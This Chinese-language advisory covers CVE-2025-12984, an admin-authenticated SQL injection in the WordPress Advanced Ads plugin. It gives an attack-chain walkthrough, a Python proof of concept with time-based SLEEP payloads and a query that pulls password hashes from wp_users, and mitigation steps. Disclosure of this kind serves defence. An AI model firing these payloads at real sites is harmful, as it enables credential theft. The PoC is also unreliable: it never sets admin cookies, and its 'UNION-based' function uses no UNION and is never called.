CVE-2025-12984 WordPress Advanced Ads插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12984

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Advanced Ads – Ad Manager & AdSense (WordPress插件)

漏洞概述

WordPress的Advanced Ads – Ad Manager & AdSense插件存在SQL注入漏洞。该漏洞源于2.0.15及之前版本中，对用户提供的'order'参数缺乏充分的转义处理，同时现有SQL查询也未进行足够的预处理。这使得具有管理员级别及以上权限的认证攻击者能够向现有查询追加额外的SQL语句，从而提取数据库中的敏感信息。该漏洞的CVSS评分为4.9，属于中等严重程度，主要影响数据库的机密性。攻击者无需用户交互即可利用此漏洞，但需要拥有高权限账户。

技术细节

漏洞位于插件的管理界面Placement列表功能中，具体在处理排序参数'order'时未进行安全过滤。攻击者可以通过构造恶意的order参数值（如'ASC,SELECT SLEEP(5)--'），在SQL查询中注入额外的SQL语句。由于插件使用了直接拼接字符串的方式构建ORDER BY子句，而非使用参数化查询，导致用户输入被直接嵌入SQL语句中。攻击者利用此漏洞可以：（1）通过UNION SELECT提取数据库中的用户密码哈希、API密钥等敏感数据；（2）通过BENCHMARK或SLEEP函数进行时间盲注以推断数据；（3）在某些配置下可能实现远程代码执行。修复版本为2.0.16，需要管理员权限才能利用此漏洞。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标网站使用的WordPress及Advanced Ads插件版本，确认版本小于等于2.0.15

STEP 2

权限获取

攻击者获取WordPress管理员级别或更高级别的账户访问权限，可以通过社会工程、凭证填充或其他方式获取

STEP 3

构造恶意请求

攻击者构造包含SQL注入payload的HTTP请求，在'order'参数中注入恶意SQL语句，如使用UNION SELECT或时间盲注技术

STEP 4

执行注入攻击

发送恶意请求到插件的Placement列表管理页面，服务器将注入的SQL代码作为查询的一部分执行

STEP 5

数据提取

通过注入的SQL语句提取数据库中的敏感信息，如用户凭证、API密钥、配置数据等

STEP 6

权限提升/持久化

利用获取的敏感信息进一步提升权限或在其他系统中横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12984 PoC - SQL Injection in Advanced Ads WordPress Plugin
# Target: WordPress site with Advanced Ads plugin <= 2.0.15
# Authentication: Requires Administrator-level access

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"
admin_path = f"{target_url}/wp-admin"

# Session with admin cookies
session = requests.Session()

def sql_injection_test(order_param):
    """Test for SQL injection via order parameter"""
    url = f"{admin_path}/admin.php?page=advanced-ads-placements"
    params = {
        'order': order_param,
        'orderby': 'title'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        response = session.get(url, params=params, headers=headers, timeout=30)
        return response.status_code, len(response.text)
    except Exception as e:
        return None, str(e)

def extract_admin_hash(order_param):
    """Extract admin password hash via UNION-based injection"""
    malicious_order = f"(SELECT GROUP_CONCAT(user_login,0x3a,user_pass) FROM wp_users LIMIT 1)"
    return sql_injection_test(malicious_order)

def time_based_injection(order_param):
    """Time-based blind SQL injection"""
    # Sleep for 5 seconds if database is MySQL
    malicious_order = "1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)"
    return sql_injection_test(malicious_order)

if __name__ == "__main__":
    print("[*] CVE-2025-12984 SQL Injection Test")
    print(f"[*] Target: {target_url}")
    print("[*] Testing basic SQL injection...")
    
    status, length = sql_injection_test("1 ASC")
    print(f"[*] Normal query - Status: {status}, Length: {length}")
    
    status, length = time_based_injection(None)
    print(f"[*] Time-based injection - Status: {status}, Length: {length}")

影响范围

Advanced Ads插件 <= 2.0.15

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 限制/admin/admin.php?page=advanced-ads-placements的访问，仅允许受信任的IP地址访问；2) 暂时禁用Advanced Ads插件直到完成升级；3) 启用WordPress的数据库前缀和强密码策略；4) 监控wp-admin目录下的异常SQL查询日志；5) 考虑使用第三方安全插件如Wordfence进行实时防护。